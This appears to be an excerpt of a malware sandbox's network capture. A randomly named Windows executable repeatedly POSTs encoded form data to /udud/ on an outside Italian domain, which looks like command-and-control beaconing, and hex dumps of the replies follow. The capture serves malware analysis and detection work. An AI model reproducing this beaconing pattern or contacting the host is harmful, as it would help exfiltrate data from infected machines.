                                                                                                May 27, 2024 12:31:54.806174994 CEST1289INData Raw: 6e 64 65 78 3a 2d 31 3b 74 6f 70 3a 2d 33 30 30 70 78 3b 6c 65 66 74 3a 2d 35 30 70 78 3b 68 65 69 67 68 74 3a 31 33 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 69 6e 68 65 72 69 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 72
                                                                                                Data Ascii: ndex:-1;top:-300px;left:-50px;height:1300px;position:inherit}.container-content__right{background:url("//img.sedoparking.com/templates/bg/multi-arrows.png") #273948 no-repeat center top;background-size:95% 2940px;flex-grow:2;-moz-transform:sca
                                                                                                May 27, 2024 12:31:54.806186914 CEST1289INData Raw: 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 23 39 66 64 38 30 31 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65
                                                                                                Data Ascii: ont-weight:bold;text-decoration:underline;color:#9fd801}.two-tier-ads-list__list-element-text{padding:3px 0 6px 0;margin:.11em 0;line-height:18px;color:#fff}.two-tier-ads-list__list-element-link{font-size:1em;text-decoration:underline;color:#9
                                                                                                May 27, 2024 12:31:54.995538950 CEST1289INData Raw: 6e 63 79 22 3a 22 22 2c 22 61 64 75 6c 74 46 6c 61 67 22 3a 66 61 6c 73 65 2c 22 70 75 22 3a 22 2f 2f 77 77 77 2e 64 6f 6e 61 6e 74 65 64 65 6f 76 75 6c 6f 73 2e 73 70 61 63 65 22 2c 22 64 6e 73 68 22 3a 74 72 75 65 2c 22 64 70 73 68 22 3a 66 61
                                                                                                Data Ascii: ncy":"","adultFlag":false,"pu":"//www.donantedeovulos.space","dnsh":true,"dpsh":false,"toSell":false,"cdnHost":"img.sedoparking.com","adblockkey":" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RX


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                9192.168.11.30498393.73.27.108807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:32:01.308526039 CEST763OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.valentinaetommaso.it
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.valentinaetommaso.it
                                                                                                Referer: http://www.valentinaetommaso.it/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 73 45 74 36 59 73 6c 78 48 41 76 6e 79 50 43 38 6c 50 73 35 52 76 32 46 41 58 64 50 38 6a 4c 42 30 52 46 2f 48 6e 44 36 2f 6b 77 76 56 6d 67 6f 77 55 4f 4e 41 57 33 4f 70 4d 35 69 74 47 36 54 6e 74 55 35 52 36 68 70 77 67 69 70 6d 42 4a 53 7a 4c 51 76 34 45 32 6b 72 64 52 6d 37 51 41 4e 30 48 6a 44 4e 63 69 73 67 63 32 35 48 6a 77 57 72 53 2f 65 53 4d 6c 55 75 6d 68 78 4f 37 6b 77 39 69 38 4e 69 57 38 4c 69 56 46 33 55 53 56 41 32 61 48 71 6e 66 34 49 63 66 42 44 63 2f 34 79 71 32 56 37 72 6b 37 72 59 4d 55 75 62 5a 6b 4d 32 5a 68 38 41 7a 77 75 41 2b 42 31 6f 76 75 73 52 77 3d 3d
                                                                                                Data Ascii: Pl9P8ldX=sEt6YslxHAvnyPC8lPs5Rv2FAXdP8jLB0RF/HnD6/kwvVmgowUONAW3OpM5itG6TntU5R6hpwgipmBJSzLQv4E2krdRm7QAN0HjDNcisgc25HjwWrS/eSMlUumhxO7kw9i8NiW8LiVF3USVA2aHqnf4IcfBDc/4yq2V7rk7rYMUubZkM2Zh8AzwuA+B1ovusRw==
                                                                                                May 27, 2024 12:32:02.942785025 CEST1289INHTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:32:02 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=716og1qojo3bifpm2m5772tjev; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                Content-Encoding: gzip
                                                                                                Data Raw: 33 37 39 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 6d 77 db c6 92 e6 e7 9b 73 e6 3f 20 dc b9 b9 d2 46 04 5f 25 8a b2 e8 ac 22 cb b1 76 2c 5b d7 92 93 b9 d7 f6 f0 80 20 48 22 26 01 06 00 25 cb 8e 7f d8 7e de 3f b6 cf 53 dd 0d 34 f8 22 d1 4e e6 cc 7c 58 1f 4b 02 d1 dd d5 d5 d5 d5 55 d5 d5 55 cd e3 6f 9f bc 3c bd fe c7 e5 99 33 c9 66 d3 c7 df 1c f3 8f e3 4f bd 34 ed 55 a2 b8 fa 6b 5a 71 e6 49 30 0a 3f f4 2a f1 f8 08 b5 b2 79 7a 54 ab c5 e3 b9 3b 0b 6a 51 fa 3f 2a ce d4 8b c6 bd 4a 98 55 d8 3c f0 86 8f 8f a7 61 f4 de 49 82 69 af 82 b6 7e 1c 45 81 9f 55 9c 09 e0 f4 2a 06 c2 b0 31 0c 9b d3 8f 8b 49 b7 33 9a 34 5d 7f 1a 2f 86 a3 24 8e 32 37 0a 50 d9 4f e2 34 8d 93 70 1c 46 db c1 1b a1 69 ea 8e d3 cc cb 42 df f5 e3 d9 12 8c 59 90 79 8e 3f f1 92 34 c8 7a 95 45 36 aa 1e 56 6c c8 21 f0 fc 22 1c 6b a3 70 1a a4 b5 e6 10 ff 43 fe dc b4 26 6e 7a 33 fe 61 3e e9 f9 83 96 d7 39 0c ba fb 9d 8a 93 dd cd 03 90 67 e6 8d 83 1a 8a bf ff 30 9b 56 9c 34 fc 18 80 c2 5e 74 f7 a7 20 51 ef d4 ea 9d 11 7f 3e fe 76 f8 a5 48 34 [TRUNCATED]
                                                                                                Data Ascii: 3794}mws? F_%"v,[ H"&%~?S4"N|XKUUo<3fO4UkZqI0?*yzT;jQ?*JU<aIi~EU*1I34]/$27PO4pFiBYy?4zE6Vl!"kpC&nz3a>9g0V4^t Q>vH4>449-lz{4fT_Z8w,E-^Ol~Lp#4{g`8\efqv~(,o<3$Q7S@ g3/kDo7ap;$m8&apAU>Qkd0,D>FGW'x2:MSY_*k?8`z'aE$[ZkS?3#EF*Z3XU/mt%bRZ-F5"![ju}aJhiS>%w'Qj28|1Y<7lGZk'k!7Bh:-^E+'|rg(qVQ7&m0X9<{{idN2<'ow0uCXW/{Q7
                                                                                                May 27, 2024 12:32:02.942862988 CEST1289INData Raw: c5 0c 3a c3 fd 6d 11 24 77 57 c1 14 a6 58 9c 9c 4c a7 3b 7f a3 ad e6 3c 76 28 34 df 50 62 ff cf 5e 05 82 b7 f2 ee 8d 96 b5 f7 2f e2 77 7f db 7d 14 1c 67 2e 14 d2 38 9b 3c 0a be ff 7e 37 7b 13 bc 73 93 60 16 df 04 27 19 54 d6 60 91 05 3b 15 23 f4
                                                                                                Data Ascii: :m$wWXL;<v(4Pb^/w}g.8<~7{s`'T`;#*lgwOcf:z1Hv*I@U+a#1gSeLDx-Ke1QuI@ze$NEr2$w0"@]0vwvs
                                                                                                May 27, 2024 12:32:02.942986012 CEST1289INData Raw: 9c c2 d5 c8 c5 3b 8e e3 31 ac 62 6f 3c f3 22 8c 2e a1 87 10 ee 4b 97 fe ce 1f c2 61 ef a7 eb 8b ea 7e bb 79 71 71 f5 bc a2 40 4c 02 3a 39 7a e0 1b f5 59 b9 4f f2 8f a2 c4 7a b4 6e c1 f1 77 47 90 1b c1 a3 9b 30 0d a1 2b c3 ec ee 68 12 0e 87 41 a4
                                                                                                Data Ascii: ;1bo<".Ka~yqq@L:9zYOznwG0+hA>VkEx\+?L,?~ZU'F~H3*SU]%UnTxP'hR@*"hwcf_fY5209];\h:1X5`5PN
                                                                                                May 27, 2024 12:32:02.943041086 CEST1289INData Raw: ab a3 30 49 95 e1 aa 84 75 09 81 51 d5 97 b5 61 99 7f 61 e6 0c e4 54 49 ad 5b 5b c9 86 d8 c1 54 1e 9f 3f 77 2e 4e ae 5f 9d 5f bc 7c 71 fe d2 79 72 ee 6c b6 06 95 11 08 96 53 26 16 ba 36 18 2f 91 ff 6b f0 b8 5e 64 19 9c eb f0 dc c3 b9 8e a7 24 84
                                                                                                Data Ascii: 0IuQaaTI[[T?w.N__|qyrlS&6/k^d$Aw ?sQ/X1(Xt?aCTduK&B:rKHJq;)H#)DNnpE6"n;~AbSWNzM1K$IBrK<UpcX:[2tnv1
                                                                                                May 27, 2024 12:32:02.943114996 CEST1289INData Raw: 03 74 c3 75 4d 89 07 11 23 c8 08 62 6d fd dc 70 81 80 5e 3d 55 08 4f 3d 28 ce 37 c5 0f ea b6 3a 10 cf 90 c1 4d f0 c5 61 b3 29 18 1e a8 67 10 53 96 07 a6 88 b4 16 5a 92 d6 3f 73 96 b1 a2 73 62 73 10 24 32 b0 50 d4 06 19 01 96 c2 a4 db 66 3b 88 4a
                                                                                                Data Ascii: tuM#bmp^=UO=(7:Ma)gSZ?ssbs$2Pf;J(w[.xC1FK:4s,R+B|8UO!@(r-M}3.^\<Flz}6]>OW/+bhA*Qg^NSuV+qFeOGz;Xup-H
                                                                                                May 27, 2024 12:32:02.943227053 CEST1289INData Raw: 7e f6 f2 f5 75 ff e7 93 eb ca d1 c8 9b a6 c1 5e 65 43 83 93 27 4f ce af cf 5f be 38 79 be 4d ed ab 67 e7 97 97 e8 b0 7f fa f2 ca 80 06 c2 08 ae ff 15 eb ab cf 18 0e 61 c3 f4 82 d2 84 42 6e c1 38 1b 83 43 a8 de 63 13 05 fb ce bf cb df cb e8 fa 99
                                                                                                Data Ascii: ~u^eC'O_8yMgaBn8CcD94$|l;M:}1g/hm^#Gb_=Gsq~[{[[6&~r SC?zU0q%"`-o<n5g)c$i D_$jzTf:^k%
                                                                                                May 27, 2024 12:32:02.943280935 CEST1289INData Raw: d2 25 4c cf b8 1d c9 3f 4f bc 14 02 74 9c 7f 0e d3 4b c5 14 4f 40 b9 70 6a bd 67 de 3d c4 f8 d2 7b 3d ce be a2 3a b7 3b 80 28 5d 9c c0 33 7c 07 0b b1 10 52 e3 6b 4f a6 4a 51 6e 7c 32 4c 39 71 86 d0 4c cc 26 93 0f 44 9d 3f 39 b9 3e eb 5f 9f 5f 9c
                                                                                                Data Ascii: %L?OtKO@pjg={=:;(]3|RkOJQn|2L9qL&D?9>__n$zuu_RoHMcNrAo5}4Imq[9M|h=}nM~iN]uA)"hiwwjxi`W^SeP
                                                                                                May 27, 2024 12:32:02.943308115 CEST1289INData Raw: 74 9c 9d 14 17 97 ed 62 16 bd d4 91 be 60 3e a0 0f 2f c6 34 7a 90 80 e8 66 31 f5 92 9c e0 0f 8f 9f e3 86 77 81 8e 13 43 8a fb 46 ad e7 22 41 24 26 46 c5 71 cc f2 e1 0d e3 59 e8 23 b6 0b fd 3b 27 f9 db 62 a4 08 0d 03 13 62 a0 b8 89 d8 1b cb f0 11
                                                                                                Data Ascii: tb`>/4zf1wCF"A$&FqY#;'bbB`v;w1qcC0E-EJ\2$84a+%e\*SJ]1Qg4uj4x#,P*Dk"#9}2_h,7w{kP}j7B>|/Jr>/9q$
                                                                                                May 27, 2024 12:32:02.943344116 CEST1289INData Raw: 1e 14 7d 37 c3 86 6d f1 25 d8 3f 60 a5 be 86 be a0 9d 03 61 fe 72 41 b6 3d 83 b1 a4 09 8f 48 7a 1e e7 ab 43 fa 4b 58 41 ff 04 6e f8 e6 2b 11 bb 2f 16 f1 0d 5c b9 30 44 ee ad 3d 4f f0 55 3e 4c 18 81 5a 46 5d 58 21 c8 3e 94 58 bc a2 19 7c 24 e6 1c
                                                                                                Data Ascii: }7m%?`arA=HzCKXAn+/\0D=OU>LZF]X!>X|$Jw~0C}F-1]j }:]$[o(Zdz`}I"A1$2N7~Sv7&:S5E4;8]m)ODfZWXELJ
                                                                                                May 27, 2024 12:32:02.943403006 CEST1289INData Raw: 96 fa 20 9a af 02 78 c5 99 0b 5a b9 c0 66 09 33 69 36 6f 70 b3 a2 00 f1 a3 eb bb e3 37 f4 6a 11 70 ca af 45 db 50 8b d7 7f 5c 16 bb 58 32 2d 6b e3 c6 83 f5 0d 70 10 e1 4f ce 23 8b 78 e7 76 c2 da 89 f6 ef 70 fb 2b 8e 79 31 3f 73 1f fa f9 93 33 7c
                                                                                                Data Ascii: xZf3i6op7jpEP\X2-kpO#xvp+y1?s3|OWQ[Llu=M7_vE (%3{V{?*3YPIgKopQ_<0K#F+:CCN[jiAKpPxU]dak!`8^Xy0d


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                10192.168.11.30498403.73.27.108807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:32:04.016633987 CEST783OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.valentinaetommaso.it
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.valentinaetommaso.it
                                                                                                Referer: http://www.valentinaetommaso.it/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 73 45 74 36 59 73 6c 78 48 41 76 6e 78 75 53 38 6e 6f 34 35 55 50 33 33 4d 33 64 50 7a 44 4c 46 30 52 5a 2f 48 6d 48 71 2f 53 49 76 55 48 51 6f 7a 52 36 4e 44 57 33 4f 78 63 34 6f 6a 6d 36 4d 6e 74 59 78 52 2f 5a 70 77 6b 79 70 6d 44 68 53 7a 38 73 77 35 55 32 6d 7a 74 52 6b 6b 67 41 4e 30 48 6a 44 4e 64 54 48 67 63 65 35 47 58 4d 57 35 6a 2f 64 54 4d 6c 58 2b 32 68 78 46 62 6c 35 39 69 39 71 69 53 30 74 69 58 74 33 55 58 35 41 32 4f 54 6c 73 66 34 4f 44 76 41 54 61 2f 49 2f 73 53 5a 6e 72 58 6a 53 66 2f 55 48 58 75 56 57 72 61 56 2b 54 54 4d 44 63 2f 73 64 71 74 76 33 4d 39 38 6f 56 4c 70 64 32 49 78 4c 32 2f 2b 41 69 4f 48 74 46 6b 73 3d
                                                                                                Data Ascii: Pl9P8ldX=sEt6YslxHAvnxuS8no45UP33M3dPzDLF0RZ/HmHq/SIvUHQozR6NDW3Oxc4ojm6MntYxR/ZpwkypmDhSz8sw5U2mztRkkgAN0HjDNdTHgce5GXMW5j/dTMlX+2hxFbl59i9qiS0tiXt3UX5A2OTlsf4ODvATa/I/sSZnrXjSf/UHXuVWraV+TTMDc/sdqtv3M98oVLpd2IxL2/+AiOHtFks=
                                                                                                May 27, 2024 12:32:08.075407028 CEST1289INHTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:32:07 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=7i622l48r6s2ese9kc0f0s342d; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                Content-Encoding: gzip
                                                                                                Data Raw: 33 37 39 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 6d 77 db c6 92 e6 e7 9b 73 e6 3f 20 dc b9 b9 d2 46 04 5f 25 8a b2 e8 ac 22 cb b1 76 2c 5b d7 92 93 b9 d7 f6 f0 80 20 48 22 26 01 06 00 25 cb 8e 7f d8 7e de 3f b6 cf 53 dd 0d 34 f8 22 d1 4e e6 cc 7c 58 1f 4b 02 d1 dd d5 d5 d5 d5 55 d5 d5 55 cd e3 6f 9f bc 3c bd fe c7 e5 99 33 c9 66 d3 c7 df 1c f3 8f e3 4f bd 34 ed 55 a2 b8 fa 6b 5a 71 e6 49 30 0a 3f f4 2a f1 f8 08 b5 b2 79 7a 54 ab c5 e3 b9 3b 0b 6a 51 fa 3f 2a ce d4 8b c6 bd 4a 98 55 d8 3c f0 86 8f 8f a7 61 f4 de 49 82 69 af 82 b6 7e 1c 45 81 9f 55 9c 09 e0 f4 2a 06 c2 b0 31 0c 9b d3 8f 8b 49 b7 33 9a 34 5d 7f 1a 2f 86 a3 24 8e 32 37 0a 50 d9 4f e2 34 8d 93 70 1c 46 db c1 1b a1 69 ea 8e d3 cc cb 42 df f5 e3 d9 12 8c 59 90 79 8e 3f f1 92 34 c8 7a 95 45 36 aa 1e 56 6c c8 21 f0 fc 22 1c 6b a3 70 1a a4 b5 e6 10 ff 43 fe dc b4 26 6e 7a 33 fe 61 3e e9 f9 83 96 d7 39 0c ba fb 9d 8a 93 dd cd 03 90 67 e6 8d 83 1a 8a bf ff 30 9b 56 9c 34 fc 18 80 c2 5e 74 f7 a7 20 51 ef d4 ea 9d 11 7f 3e fe 76 f8 a5 48 34 [TRUNCATED]
                                                                                                Data Ascii: 3794}mws? F_%"v,[ H"&%~?S4"N|XKUUo<3fO4UkZqI0?*yzT;jQ?*JU<aIi~EU*1I34]/$27PO4pFiBYy?4zE6Vl!"kpC&nz3a>9g0V4^t Q>vH4>449-lz{4fT_Z8w,E-^Ol~Lp#4{g`8\efqv~(,o<3$Q7S@ g3/kDo7ap;$m8&apAU>Qkd0,D>FGW'x2:MSY_*k?8`z'aE$[ZkS?3#EF*Z3XU/mt%bRZ-F5"![ju}aJhiS>%w'Qj28|1Y<7lGZk'k!7Bh:-^E+'|rg(qVQ7&m0X9<{{idN2<'ow0uCXW/{Q7
                                                                                                May 27, 2024 12:32:08.075537920 CEST1289INData Raw: c5 0c 3a c3 fd 6d 11 24 77 57 c1 14 a6 58 9c 9c 4c a7 3b 7f a3 ad e6 3c 76 28 34 df 50 62 ff cf 5e 05 82 b7 f2 ee 8d 96 b5 f7 2f e2 77 7f db 7d 14 1c 67 2e 14 d2 38 9b 3c 0a be ff 7e 37 7b 13 bc 73 93 60 16 df 04 27 19 54 d6 60 91 05 3b 15 23 f4
                                                                                                Data Ascii: :m$wWXL;<v(4Pb^/w}g.8<~7{s`'T`;#*lgwOcf:z1Hv*I@U+a#1gSeLDx-Ke1QuI@ze$NEr2$w0"@]0vwvs
                                                                                                May 27, 2024 12:32:08.075649977 CEST1289INData Raw: 9c c2 d5 c8 c5 3b 8e e3 31 ac 62 6f 3c f3 22 8c 2e a1 87 10 ee 4b 97 fe ce 1f c2 61 ef a7 eb 8b ea 7e bb 79 71 71 f5 bc a2 40 4c 02 3a 39 7a e0 1b f5 59 b9 4f f2 8f a2 c4 7a b4 6e c1 f1 77 47 90 1b c1 a3 9b 30 0d a1 2b c3 ec ee 68 12 0e 87 41 a4
                                                                                                Data Ascii: ;1bo<".Ka~yqq@L:9zYOznwG0+hA>VkEx\+?L,?~ZU'F~H3*SU]%UnTxP'hR@*"hwcf_fY5209];\h:1X5`5PN
                                                                                                May 27, 2024 12:32:08.075674057 CEST1289INData Raw: ab a3 30 49 95 e1 aa 84 75 09 81 51 d5 97 b5 61 99 7f 61 e6 0c e4 54 49 ad 5b 5b c9 86 d8 c1 54 1e 9f 3f 77 2e 4e ae 5f 9d 5f bc 7c 71 fe d2 79 72 ee 6c b6 06 95 11 08 96 53 26 16 ba 36 18 2f 91 ff 6b f0 b8 5e 64 19 9c eb f0 dc c3 b9 8e a7 24 84
                                                                                                Data Ascii: 0IuQaaTI[[T?w.N__|qyrlS&6/k^d$Aw ?sQ/X1(Xt?aCTduK&B:rKHJq;)H#)DNnpE6"n;~AbSWNzM1K$IBrK<UpcX:[2tnv1
                                                                                                May 27, 2024 12:32:08.075787067 CEST1289INData Raw: 03 74 c3 75 4d 89 07 11 23 c8 08 62 6d fd dc 70 81 80 5e 3d 55 08 4f 3d 28 ce 37 c5 0f ea b6 3a 10 cf 90 c1 4d f0 c5 61 b3 29 18 1e a8 67 10 53 96 07 a6 88 b4 16 5a 92 d6 3f 73 96 b1 a2 73 62 73 10 24 32 b0 50 d4 06 19 01 96 c2 a4 db 66 3b 88 4a
                                                                                                Data Ascii: tuM#bmp^=UO=(7:Ma)gSZ?ssbs$2Pf;J(w[.xC1FK:4s,R+B|8UO!@(r-M}3.^\<Flz}6]>OW/+bhA*Qg^NSuV+qFeOGz;Xup-H
                                                                                                May 27, 2024 12:32:08.075881004 CEST1289INData Raw: 7e f6 f2 f5 75 ff e7 93 eb ca d1 c8 9b a6 c1 5e 65 43 83 93 27 4f ce af cf 5f be 38 79 be 4d ed ab 67 e7 97 97 e8 b0 7f fa f2 ca 80 06 c2 08 ae ff 15 eb ab cf 18 0e 61 c3 f4 82 d2 84 42 6e c1 38 1b 83 43 a8 de 63 13 05 fb ce bf cb df cb e8 fa 99
                                                                                                Data Ascii: ~u^eC'O_8yMgaBn8CcD94$|l;M:}1g/hm^#Gb_=Gsq~[{[[6&~r SC?zU0q%"`-o<n5g)c$i D_$jzTf:^k%
                                                                                                May 27, 2024 12:32:08.075902939 CEST1289INData Raw: d2 25 4c cf b8 1d c9 3f 4f bc 14 02 74 9c 7f 0e d3 4b c5 14 4f 40 b9 70 6a bd 67 de 3d c4 f8 d2 7b 3d ce be a2 3a b7 3b 80 28 5d 9c c0 33 7c 07 0b b1 10 52 e3 6b 4f a6 4a 51 6e 7c 32 4c 39 71 86 d0 4c cc 26 93 0f 44 9d 3f 39 b9 3e eb 5f 9f 5f 9c
                                                                                                Data Ascii: %L?OtKO@pjg={=:;(]3|RkOJQn|2L9qL&D?9>__n$zuu_RoHMcNrAo5}4Imq[9M|h=}nM~iN]uA)"hiwwjxi`W^SeP
                                                                                                May 27, 2024 12:32:08.075946093 CEST1289INData Raw: 74 9c 9d 14 17 97 ed 62 16 bd d4 91 be 60 3e a0 0f 2f c6 34 7a 90 80 e8 66 31 f5 92 9c e0 0f 8f 9f e3 86 77 81 8e 13 43 8a fb 46 ad e7 22 41 24 26 46 c5 71 cc f2 e1 0d e3 59 e8 23 b6 0b fd 3b 27 f9 db 62 a4 08 0d 03 13 62 a0 b8 89 d8 1b cb f0 11
                                                                                                Data Ascii: tb`>/4zf1wCF"A$&FqY#;'bbB`v;w1qcC0E-EJ\2$84a+%e\*SJ]1Qg4uj4x#,P*Dk"#9}2_h,7w{kP}j7B>|/Jr>/9q$
                                                                                                May 27, 2024 12:32:08.076020002 CEST1289INData Raw: 1e 14 7d 37 c3 86 6d f1 25 d8 3f 60 a5 be 86 be a0 9d 03 61 fe 72 41 b6 3d 83 b1 a4 09 8f 48 7a 1e e7 ab 43 fa 4b 58 41 ff 04 6e f8 e6 2b 11 bb 2f 16 f1 0d 5c b9 30 44 ee ad 3d 4f f0 55 3e 4c 18 81 5a 46 5d 58 21 c8 3e 94 58 bc a2 19 7c 24 e6 1c
                                                                                                Data Ascii: }7m%?`arA=HzCKXAn+/\0D=OU>LZF]X!>X|$Jw~0C}F-1]j }:]$[o(Zdz`}I"A1$2N7~Sv7&:S5E4;8]m)ODfZWXELJ
                                                                                                May 27, 2024 12:32:08.076137066 CEST1289INData Raw: 96 fa 20 9a af 02 78 c5 99 0b 5a b9 c0 66 09 33 69 36 6f 70 b3 a2 00 f1 a3 eb bb e3 37 f4 6a 11 70 ca af 45 db 50 8b d7 7f 5c 16 bb 58 32 2d 6b e3 c6 83 f5 0d 70 10 e1 4f ce 23 8b 78 e7 76 c2 da 89 f6 ef 70 fb 2b 8e 79 31 3f 73 1f fa f9 93 33 7c
                                                                                                Data Ascii: xZf3i6op7jpEP\X2-kpO#xvp+y1?s3|OWQ[Llu=M7_vE (%3{V{?*3YPIgKopQ_<0K#F+:CCN[jiAKpPxU]dak!`8^Xy0d


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                11192.168.11.30498413.73.27.108807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:32:06.734349966 CEST1700OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.valentinaetommaso.it
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.valentinaetommaso.it
                                                                                                Referer: http://www.valentinaetommaso.it/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 73 45 74 36 59 73 6c 78 48 41 76 6e 78 75 53 38 6e 6f 34 35 55 50 33 33 4d 33 64 50 7a 44 4c 46 30 52 5a 2f 48 6d 48 71 2f 53 41 76 56 31 59 6f 30 43 53 4e 43 57 33 4f 34 38 34 72 6a 6d 37 51 6e 74 51 50 52 2f 64 66 77 69 75 70 6e 69 42 53 33 39 73 77 67 45 32 6d 76 64 52 68 37 51 41 55 30 48 7a 48 4e 63 76 48 67 63 65 35 47 57 63 57 70 69 2f 64 65 73 6c 55 75 6d 68 74 4f 37 6b 51 39 6d 5a 51 69 53 77 62 69 6e 4e 33 61 58 70 41 77 34 76 6c 76 2f 34 4d 41 76 42 57 61 2f 46 2f 73 53 74 56 72 58 37 34 66 39 45 48 64 71 51 78 2f 37 78 4a 50 6c 46 4c 57 72 52 69 68 4c 48 43 50 64 67 65 54 59 41 73 38 37 59 67 2f 4b 61 32 7a 65 4c 7a 66 6a 43 58 39 41 44 63 58 71 38 45 55 79 39 6e 5a 65 4d 69 6f 38 41 72 61 4f 2b 55 59 39 72 45 4c 72 52 62 64 45 48 32 6a 49 51 39 49 35 37 2f 54 65 57 63 50 52 73 6d 62 4c 43 37 47 48 32 43 6b 56 53 33 39 57 74 2f 71 5a 65 7a 33 51 70 6a 39 77 49 44 42 59 30 75 42 69 58 68 4b 49 50 31 44 4f 57 4a 45 71 59 6d 42 52 79 64 35 35 74 56 74 62 37 42 71 [TRUNCATED]
                                                                                                Data Ascii: 